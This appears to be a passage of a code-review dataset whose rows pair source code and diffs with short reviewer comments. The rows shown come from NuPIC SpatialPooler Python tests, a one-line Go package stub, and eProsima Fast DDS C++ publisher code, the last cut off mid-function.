numcon = (connected.nonzero()[0]).size
self.assertEqual(numcon, 5)
connectedPct = 0
perm = sp._initPermanence(mask, connectedPct)
connected = (perm >= sp._synPermConnected).astype(int)
numcon = (connected.nonzero()[0]).size
self.assertEqual(numcon, 0)
connectedPct = 0.5
sp._potentialRadius = 100
sp._numInputs = 100
mask = numpy.ones(100)
perm = sp._initPermanence(mask, connectedPct)
connected = (perm >= sp._synPermConnected).astype(int)
numcon = (connected.nonzero()[0]).size
self.assertGreater(numcon, 0)
self.assertLess(numcon, sp._numInputs)
minThresh = 0.0
maxThresh = sp._synPermMax
self.assertEqual(numpy.logical_and((perm >= minThresh),
(perm <= maxThresh)).all(), True)
def testInitPermanence2(self):
"""
Test initial permanence generation. ensure that permanence values
are only assigned to bits within a column's potential pool.
"""
sp = self._sp
sp._raisePermanenceToThreshold = Mock()
sp._numInputs = 10
connectedPct = 1
mask = numpy.array([1, 1, 0, 0, 0, 0, 0, 0, 0, 0])
perm = sp._initPermanence(mask, connectedPct)
connected = list((perm > 0).astype(int))
trueConnected = [1, 1, 0, 0, 0, 0, 0, 0, 0, 0]
self.assertListEqual(connected, trueConnected)
sp._numInputs = 10
connectedPct = 1
mask = numpy.array([0, 0, 0, 0, 1, 1, 1, 0, 0, 0])
perm = sp._initPermanence(mask, connectedPct)
connected = list((perm > 0).astype(int))
trueConnected = [0, 0, 0, 0, 1, 1, 1, 0, 0, 0]
self.assertListEqual(connected, trueConnected)
sp._numInputs = 10
connectedPct = 1
mask = numpy.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1])
perm = sp._initPermanence(mask, connectedPct)
connected = list((perm > 0).astype(int))
trueConnected = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1]
self.assertListEqual(connected, trueConnected)
sp._numInputs = 10
connectedPct = 1
mask = numpy.array([1, 1, 1, 1, 1, 1, 1, 0, 1, 1])
perm = sp._initPermanence(mask, connectedPct)
connected = list((perm > 0).astype(int))
trueConnected = [1, 1, 1, 1, 1, 1, 1, 0, 1, 1]
self.assertListEqual(connected, trueConnected)
def testUpdateDutyCycleHelper(self):
"""
Tests that duty cycles are updated properly according
to the mathematical formula. also check the effects of
supplying a maxPeriod to the function.
"""
dc = numpy.zeros(5)
dc = numpy.array([1000.0, 1000.0, 1000.0, 1000.0, 1000.0])
period = 1000
newvals = numpy.zeros(5)
newDc = SpatialPooler._updateDutyCyclesHelper(dc, newvals, period)
trueNewDc = [999, 999, 999, 999, 999]
self.assertListEqual(list(newDc), trueNewDc)
dc = numpy.array([1000.0, 1000.0, 1000.0, 1000.0, 1000.0])
period = 1000
newvals = numpy.zeros(5)
newvals.fill(1000)
newDc = SpatialPooler._updateDutyCyclesHelper(dc, newvals, period)
trueNewDc = list(dc)
self.assertListEqual(list(newDc), trueNewDc)
dc = numpy.array([1000, 1000, 1000, 1000, 1000])
newvals = numpy.array([2000, 4000, 5000, 6000, 7000])
period = 1000
newDc = SpatialPooler._updateDutyCyclesHelper(dc, newvals, period)
trueNewDc = [1001, 1003, 1004, 1005, 1006]
self.assertListEqual(list(newDc), trueNewDc)
dc = numpy.array([1000, 800, 600, 400, 2000])
newvals = numpy.zeros(5)
period = 2
newDc = SpatialPooler._updateDutyCyclesHelper(dc, newvals, period)
trueNewDc = [500, 400, 300, 200, 1000]
self.assertListEqual(list(newDc), trueNewDc)
def testInhibitColumnsGlobal(self):
"""
Tests that global inhibition correctly picks the
correct top number of overlap scores as winning columns.
"""
sp = self._sp
density = 0.3
sp._numColumns = 10
overlaps = numpy.array([1, 2, 1, 4, 8, 3, 12, 5, 4, 1])
active = list(sp._inhibitColumnsGlobal(overlaps, density))
trueActive = numpy.zeros(sp._numColumns)
trueActive = [4, 6, 7]
self.assertListEqual(list(trueActive), active)
density = 0.5
sp._numColumns = 10
overlaps = numpy.array(range(10))
active = list(sp._inhibitColumnsGlobal(overlaps, density))
trueActive = numpy.zeros(sp._numColumns)
trueActive = range(5, 10)
self.assertListEqual(trueActive, active)
def testInhibitColumnsLocal(self):
sp = self._sp
density = 0.5
sp._numColumns = 10
sp._columnDimensions = numpy.array([sp._numColumns])
sp._inhibitionRadius = 2
overlaps = numpy.array([1, 2, 7, 0, 3, 4, 16, 1, 1.5, 1.7])
# L W W L L W W L L W
trueActive = [1, 2, 5, 6, 9]
active = list(sp._inhibitColumnsLocal(overlaps, density))
self.assertListEqual(trueActive, active)
density = 0.5
sp._numColumns = 10
sp._columnDimensions = numpy.array([sp._numColumns])
sp._inhibitionRadius = 3
overlaps = numpy.array([1, 2, 7, 0, 3, 4, 16, 1, 1.5, 1.7])
# L W W L L W W L L L
trueActive = [1, 2, 5, 6]
active = list(sp._inhibitColumnsLocal(overlaps, density))
# self.assertListEqual(trueActive, active)
# Test add to winners
density = 0.3333
sp._numColumns = 10
sp._columnDimensions = numpy.array([sp._numColumns])
sp._inhibitionRadius = 3
overlaps = numpy.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
# W W L L W W L L L W
trueActive = [0, 1, 4, 5, 8]
active = list(sp._inhibitColumnsLocal(overlaps, density))
self.assertListEqual(trueActive, active)
def testGetNeighbors1D(self):
"""
Test that _getNeighbors static method correctly computes
the neighbors of a column
"""
sp = self._sp
layout = numpy.array([0, 0, 1, 0, 1, 0, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 3
dimensions = numpy.array([8])
radius = 1
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([0, 1, 1, 0, 1, 1, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 3
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([0, 1, 1, 0, 0, 0, 1, 1])
layout1D = layout.reshape(-1)
columnIndex = 0
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([0, 1, 1, 0, 0, 0, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 0
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Radius to big
layout = numpy.array([1, 1, 1, 1, 1, 1, 0, 1])
layout1D = layout.reshape(-1)
columnIndex = 6
dimensions = numpy.array([8])
radius = 20
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([1, 1, 1, 1, 1, 1, 0, 1])
layout1D = layout.reshape(-1)
columnIndex = 6
dimensions = numpy.array([8])
radius = 20
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
def testGetNeighbors2D(self):
"""
Test that _getNeighbors static method correctly computes
the neighbors of a column and maps them from 2D back to 1D
"""
sp = self._sp
layout = numpy.array([
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 1, 0, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 1
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array(
[[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 2
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Radius too big
layout = numpy.array(
[[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 7
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Wrap-around
layout = numpy.array(
[[1, 0, 0, 1, 1],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 0, 0, 1, 1],
[1, 0, 0, 1, 0]])
layout1D = layout.reshape(-1)
dimensions = numpy.array([6, 5])
columnIndex = dimensions.prod() -1
radius = 1
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array(
[[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 1, 1],
[0, 0, 0, 1, 0]])
layout1D = layout.reshape(-1)
dimensions = numpy.array([6, 5])
columnIndex = dimensions.prod() -1
radius = 1
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
def testGetNeighborsND(self):
sp = self._sp
dimensions = numpy.array([5, 7, 2])
layout1D = numpy.array(range(numpy.prod(dimensions)))
layout = numpy.reshape(layout1D, dimensions)
radius = 1
x = 1
y = 3
z = 2
columnIndex = layout[z][y][x]
neighbors = sp._getNeighborsND(columnIndex, dimensions, radius,
wrapAround=True)
trueNeighbors = set()
for i in range(-radius, radius+1):
for j in range(-radius, radius+1):
for k in range(-radius, radius+1):
zprime = (z + i) % dimensions[0]
yprime = (y + j) % dimensions[1]
xprime = (x + k) % dimensions[2]
trueNeighbors.add(
layout[zprime][yprime][xprime]
)
trueNeighbors.remove(columnIndex)
self.assertListEqual(sorted(list(trueNeighbors)),
sorted(list(neighbors)))
dimensions = numpy.array([5, 7, 9])
layout1D = numpy.array(range(numpy.prod(dimensions)))
layout = numpy.reshape(layout1D, dimensions)
radius = 3
x = 0
y = 0
z = 3
columnIndex = layout[z][y][x]
neighbors = sp._getNeighborsND(columnIndex, dimensions, radius,
wrapAround=True)
trueNeighbors = set()
for i in range(-radius, radius+1):
for j in range(-radius, radius+1):
for k in range(-radius, radius+1):
zprime = (z + i) % dimensions[0]
yprime = (y + j) % dimensions[1]
xprime = (x + k) % dimensions[2]
trueNeighbors.add(
layout[zprime][yprime][xprime]
)
trueNeighbors.remove(columnIndex)
self.assertListEqual(sorted(list(trueNeighbors)),
sorted(list(neighbors)))
dimensions = numpy.array([5, 10, 7, 6])
layout1D = numpy.array(range(numpy.prod(dimensions)))
layout = numpy.reshape(layout1D, dimensions)
radius = 4
w = 2
x = 5
y = 6
z = 2
columnIndex = layout[z][y][x][w]
neighbors = sp._getNeighborsND(columnIndex, dimensions, radius,
wrapAround=True)
trueNeighbors = set()
for i in range(-radius, radius+1):
for j in range(-radius, radius+1):
for k in range(-radius, radius+1):
for m in range(-radius, radius+1):
zprime = (z + i) % dimensions[0]
yprime = (y + j) % dimensions[1]
xprime = (x + k) % dimensions[2]
wprime = (w + m) % dimensions[3]
trueNeighbors.add(layout[zprime][yprime][xprime][wprime])
trueNeighbors.remove(columnIndex)
self.assertListEqual(sorted(list(trueNeighbors)), sorted(list(neighbors)))
# These are all the same tests from 1D
layout = numpy.array([0, 0, 1, 0, 1, 0, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 3
dimensions = numpy.array([8])
radius = 1
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([0, 1, 1, 0, 1, 1, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 3
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Wrap around
layout = numpy.array([0, 1, 1, 0, 0, 0, 1, 1])
layout1D = layout.reshape(-1)
columnIndex = 0
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Radius too big
layout = numpy.array([1, 1, 1, 1, 1, 1, 0, 1])
layout1D = layout.reshape(-1)
columnIndex = 6
dimensions = numpy.array([8])
radius = 20
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# These are all the same tests from 2D
layout = numpy.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 1, 0, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]])
layout1D = layout.reshape(-1)
columnIndex = 3*5 + 2
dimensions = numpy.array([6, 5])
radius = 1
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 2
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Radius too big
layout = numpy.array([[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 7
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Wrap-around
layout = numpy.array([[1, 0, 0, 1, 1],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 0, 0, 1, 1],
[1, 0, 0, 1, 0]])
layout1D = layout.reshape(-1)
dimensions = numpy.array([6, 5])
columnIndex = dimensions.prod() -1
radius = 1
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
@unittest.skipUnless(
capnp, "pycapnp is not installed, skipping serialization test.")
def testWriteRead(self):
sp1 = SpatialPooler(
inputDimensions=[9],
columnDimensions=[5],
potentialRadius=3,
potentialPct=0.5,
globalInhibition=False,
localAreaDensity=-1.0,
numActiveColumnsPerInhArea=3,
stimulusThreshold=1,
synPermInactiveDec=0.01,
synPermActiveInc=0.1,
synPermConnected=0.10,
minPctOverlapDutyCycle=0.1,
minPctActiveDutyCycle=0.1,
dutyCyclePeriod=10,
maxBoost=10.0,
seed=42,
spVerbosity=0)
sp2 = SpatialPooler(
inputDimensions=[3, 3],
columnDimensions=[2, 2],
potentialRadius=5,
potentialPct=0.4,
globalInhibition=True,
localAreaDensity=1.0,
numActiveColumnsPerInhArea=4,
stimulusThreshold=2,
synPermInactiveDec=0.05,
synPermActiveInc=0.2,
synPermConnected=0.15,
minPctOverlapDutyCycle=0.2,
minPctActiveDutyCycle=0.2,
dutyCyclePeriod=11,
maxBoost=14.0,
seed=10,
spVerbosity=0)
# Run a record through before serializing
inputVector = numpy.array([1, 0, 1, 0, 1, 0, 0, 1, 1])
activeArray1 = numpy.zeros(5)
sp1.compute(inputVector, True, activeArray1)
proto1 = SpatialPoolerProto_capnp.SpatialPoolerProto.new_message()
sp1.write(proto1)
# Write the proto to a temp file and read it back into a new proto
with tempfile.TemporaryFile() as f:
proto1.write(f)
f.seek(0)
proto2 = SpatialPoolerProto_capnp.SpatialPoolerProto.read(f)
# Load the deserialized proto
sp2.read(proto2)
# Check that the two spatial poolers have the same attributes
self.assertSetEqual(set(sp1.__dict__.keys()), set(sp2.__dict__.keys()))
for k, v1 in sp1.__dict__.iteritems():
v2 = getattr(sp2, k)
if isinstance(v1, numpy.ndarray):
self.assertEqual(v1.dtype, v2.dtype,
"Key %s has differing dtypes: %s vs %s" % (
k, v1.dtype, v2.dtype))
self.assertTrue(numpy.isclose(v1, v2).all(), k)
elif isinstance(v1, Random) or isinstance(v1, BinaryCorticalColumns):
pass
elif isinstance(v1, float):
self.assertAlmostEqual(v1, v2)
elif isinstance(v1, numbers.Integral):
self.assertEqual(long(v1), long(v2), k)
else:
self.assertEqual(type(v1), type(v2), k)
self.assertEqual(v1, v2, k)
# Run a record through after deserializing and check results match
activeArray2 = numpy.zeros(5)
sp1.compute(inputVector, True, activeArray1)
sp2.compute(inputVector, True, activeArray2)
indices1 = set(activeArray1.nonzero()[0])
indices2 = set(activeArray2.nonzero()[0])
self.assertSetEqual(indices1, indices2)
def testRandomSPDoesNotLearn(self):
sp = SpatialPooler(inputDimensions=[5],
columnDimensions=[10])
inputArray = (numpy.random.rand(5) > 0.5).astype(uintDType)
activeArray = numpy.zeros(sp._numColumns).astype(realDType)
# Should start off at 0
self.assertEqual(sp._iterationNum, 0)
self.assertEqual(sp._iterationLearnNum, 0)
# Store the initialized state
initialPerms = copy(sp._permanences)
sp.compute(inputArray, False, activeArray)
# Should have incremented general counter but not learning counter
self.assertEqual(sp._iterationNum, 1)
self.assertEqual(sp._iterationLearnNum, 0)
# Check the initial perm state was not modified either
self.assertEqual(sp._permanences, initialPerms)
@unittest.skip("Ported from the removed FlatSpatialPooler but fails. \
See: https://github.com/numenta/nupic/issues/1897")
def testActiveColumnsEqualNumActive(self):
'''
After feeding in a record the number of active columns should
always be equal to numActivePerInhArea
'''
for i in [1, 10, 50]:
numActive = i
inputShape = 10
sp = SpatialPooler(inputDimensions=[inputShape],
columnDimensions=[100],
numActiveColumnsPerInhArea=numActive)
inputArray = (numpy.random.rand(inputShape) > 0.5).astype(uintDType)
inputArray2 = (numpy.random.rand(inputShape) > 0.8).astype(uintDType)
activeArray = numpy.zeros(sp._numColumns).astype(realDType)
# Default, learning on
sp.compute(inputArray, True, activeArray)
sp.compute(inputArray2, True, activeArray)
self.assertEqual(sum(activeArray), numActive)
# learning OFF
sp.compute(inputArray, False, activeArray)
sp.compute(inputArray2, False, activeArray)
self.assertEqual(sum(activeArray), numActive)
if __name__ == "__main__":
unittest.main()
| 1 | 19,782 | Can also cast them as `set`s and compare them. | numenta-nupic | py |
@@ -0,0 +1 @@
+package trigger | 1 | 1 | 20,991 | Still TODO I guess? | jetstack-cert-manager | go |
|
@@ -37,8 +37,6 @@
#include <fastdds/rtps/builtin/BuiltinProtocols.h>
#include <fastdds/rtps/builtin/liveliness/WLP.h>
-#include <functional>
-
using namespace eprosima::fastrtps;
using namespace ::rtps;
using namespace std::chrono; | 1 | // Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima).
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/*
* Publisher.cpp
*
*/
#include <fastrtps_deprecated/publisher/PublisherImpl.h>
#include <fastrtps_deprecated/participant/ParticipantImpl.h>
#include <fastrtps/publisher/Publisher.h>
#include <fastdds/dds/topic/TopicDataType.hpp>
#include <fastrtps/publisher/PublisherListener.h>
#include <fastdds/rtps/writer/RTPSWriter.h>
#include <fastdds/rtps/writer/StatefulWriter.h>
#include <fastdds/rtps/writer/StatelessWriter.h>
#include <fastdds/rtps/participant/RTPSParticipant.h>
#include <fastdds/rtps/RTPSDomain.h>
#include <fastrtps/log/Log.h>
#include <fastrtps/utils/TimeConversion.h>
#include <fastdds/rtps/resources/ResourceEvent.h>
#include <fastdds/rtps/resources/TimedEvent.h>
#include <fastdds/rtps/builtin/BuiltinProtocols.h>
#include <fastdds/rtps/builtin/liveliness/WLP.h>
#include <functional>
using namespace eprosima::fastrtps;
using namespace ::rtps;
using namespace std::chrono;
using eprosima::fastdds::dds::TopicDataType;
PublisherImpl::PublisherImpl(
ParticipantImpl* p,
TopicDataType* pdatatype,
const PublisherAttributes& att,
PublisherListener* listen )
: mp_participant(p)
, mp_writer(nullptr)
, mp_type(pdatatype)
, m_att(att)
#pragma warning (disable : 4355 )
, m_history(att.topic,
pdatatype->m_typeSize
#if HAVE_SECURITY
// In future v2 changepool is in writer, and writer set this value to cachechagepool.
+ 20 /*SecureDataHeader*/ + 4 + ((2 * 16) /*EVP_MAX_IV_LENGTH max block size*/ - 1 ) /* SecureDataBodey*/
+ 16 + 4 /*SecureDataTag*/
#endif
, att.historyMemoryPolicy)
, mp_listener(listen)
#pragma warning (disable : 4355 )
, m_writerListener(this)
, mp_userPublisher(nullptr)
, mp_rtpsParticipant(nullptr)
, high_mark_for_frag_(0)
, deadline_duration_us_(m_att.qos.m_deadline.period.to_ns() * 1e-3)
, timer_owner_()
, deadline_missed_status_()
, lifespan_duration_us_(m_att.qos.m_lifespan.duration.to_ns() * 1e-3)
{
deadline_timer_ = new TimedEvent(mp_participant->get_resource_event(),
[&]() -> bool
{
return deadline_missed();
},
att.qos.m_deadline.period.to_ns() * 1e-6);
lifespan_timer_ = new TimedEvent(mp_participant->get_resource_event(),
[&]() -> bool
{
return lifespan_expired();
},
m_att.qos.m_lifespan.duration.to_ns() * 1e-6);
}
PublisherImpl::~PublisherImpl()
{
delete(lifespan_timer_);
delete(deadline_timer_);
if (mp_writer != nullptr)
{
logInfo(PUBLISHER, this->getGuid().entityId << " in topic: " << this->m_att.topic.topicName);
}
RTPSDomain::removeRTPSWriter(mp_writer);
delete(this->mp_userPublisher);
}
bool PublisherImpl::create_new_change(
ChangeKind_t changeKind,
void* data)
{
WriteParams wparams;
return create_new_change_with_params(changeKind, data, wparams);
}
bool PublisherImpl::create_new_change_with_params(
ChangeKind_t changeKind,
void* data,
WriteParams& wparams)
{
/// Preconditions
if (data == nullptr)
{
logError(PUBLISHER, "Data pointer not valid");
return false;
}
if (changeKind == NOT_ALIVE_UNREGISTERED || changeKind == NOT_ALIVE_DISPOSED ||
changeKind == NOT_ALIVE_DISPOSED_UNREGISTERED)
{
if (m_att.topic.topicKind == NO_KEY)
{
logError(PUBLISHER, "Topic is NO_KEY, operation not permitted");
return false;
}
}
InstanceHandle_t handle;
if (m_att.topic.topicKind == WITH_KEY)
{
bool is_key_protected = false;
#if HAVE_SECURITY
is_key_protected = mp_writer->getAttributes().security_attributes().is_key_protected;
#endif
mp_type->getKey(data, &handle, is_key_protected);
}
// Block lowlevel writer
auto max_blocking_time = steady_clock::now() +
microseconds(::TimeConv::Time_t2MicroSecondsInt64(m_att.qos.m_reliability.max_blocking_time));
#if HAVE_STRICT_REALTIME
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex(), std::defer_lock);
if (lock.try_lock_until(max_blocking_time))
#else
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
#endif
{
CacheChange_t* ch = mp_writer->new_change(mp_type->getSerializedSizeProvider(data), changeKind, handle);
if (ch != nullptr)
{
if (changeKind == ALIVE)
{
//If these two checks are correct, we asume the cachechange is valid and thwn we can write to it.
if (!mp_type->serialize(data, &ch->serializedPayload))
{
logWarning(RTPS_WRITER, "RTPSWriter:Serialization returns false"; );
m_history.release_Cache(ch);
return false;
}
}
//TODO(Ricardo) This logic in a class. Then a user of rtps layer can use it.
if (high_mark_for_frag_ == 0)
{
uint32_t max_data_size = mp_writer->getMaxDataSize();
uint32_t writer_throughput_controller_bytes =
mp_writer->calculateMaxDataSize(m_att.throughputController.bytesPerPeriod);
uint32_t participant_throughput_controller_bytes =
mp_writer->calculateMaxDataSize(
mp_rtpsParticipant->getRTPSParticipantAttributes().throughputController.bytesPerPeriod);
high_mark_for_frag_ =
max_data_size > writer_throughput_controller_bytes ?
writer_throughput_controller_bytes :
(max_data_size > participant_throughput_controller_bytes ?
participant_throughput_controller_bytes :
max_data_size);
high_mark_for_frag_ &= ~3;
}
uint32_t final_high_mark_for_frag = high_mark_for_frag_;
// If needed inlineqos for related_sample_identity, then remove the inlinqos size from final fragment size.
if (wparams.related_sample_identity() != SampleIdentity::unknown())
{
final_high_mark_for_frag -= 32;
}
// If it is big data, fragment it.
if (ch->serializedPayload.length > final_high_mark_for_frag)
{
/// Fragment the data.
// Set the fragment size to the cachechange.
// Note: high_mark will always be a value that can be casted to uint16_t)
ch->setFragmentSize((uint16_t)final_high_mark_for_frag);
}
InstanceHandle_t change_handle = ch->instanceHandle;
if (!this->m_history.add_pub_change(ch, wparams, lock, max_blocking_time))
{
m_history.release_Cache(ch);
return false;
}
if (m_att.qos.m_deadline.period != c_TimeInfinite)
{
if (!m_history.set_next_deadline(
change_handle,
steady_clock::now() + duration_cast<system_clock::duration>(deadline_duration_us_)))
{
logError(PUBLISHER, "Could not set the next deadline in the history");
}
else
{
if (timer_owner_ == handle || timer_owner_ == InstanceHandle_t())
{
if (deadline_timer_reschedule())
{
deadline_timer_->cancel_timer();
deadline_timer_->restart_timer();
}
}
}
}
if (m_att.qos.m_lifespan.duration != c_TimeInfinite)
{
lifespan_duration_us_ = duration<double, std::ratio<1, 1000000> >(
m_att.qos.m_lifespan.duration.to_ns() * 1e-3);
lifespan_timer_->update_interval_millisec(m_att.qos.m_lifespan.duration.to_ns() * 1e-6);
lifespan_timer_->restart_timer();
}
return true;
}
}
return false;
}
bool PublisherImpl::removeMinSeqChange()
{
return m_history.removeMinChange();
}
bool PublisherImpl::removeAllChange(
size_t* removed)
{
return m_history.removeAllChange(removed);
}
const GUID_t& PublisherImpl::getGuid()
{
return mp_writer->getGuid();
}
//
bool PublisherImpl::updateAttributes(
const PublisherAttributes& att)
{
bool updated = true;
bool missing = false;
if (this->m_att.qos.m_reliability.kind == RELIABLE_RELIABILITY_QOS)
{
if (att.unicastLocatorList.size() != this->m_att.unicastLocatorList.size() ||
att.multicastLocatorList.size() != this->m_att.multicastLocatorList.size())
{
logWarning(PUBLISHER, "Locator Lists cannot be changed or updated in this version");
updated &= false;
}
else
{
for (LocatorListConstIterator lit1 = this->m_att.unicastLocatorList.begin();
lit1 != this->m_att.unicastLocatorList.end(); ++lit1)
{
missing = true;
for (LocatorListConstIterator lit2 = att.unicastLocatorList.begin();
lit2 != att.unicastLocatorList.end(); ++lit2)
{
if (*lit1 == *lit2)
{
missing = false;
break;
}
}
if (missing)
{
logWarning(PUBLISHER, "Locator: " << *lit1 << " not present in new list");
logWarning(PUBLISHER, "Locator Lists cannot be changed or updated in this version");
}
}
for (LocatorListConstIterator lit1 = this->m_att.multicastLocatorList.begin();
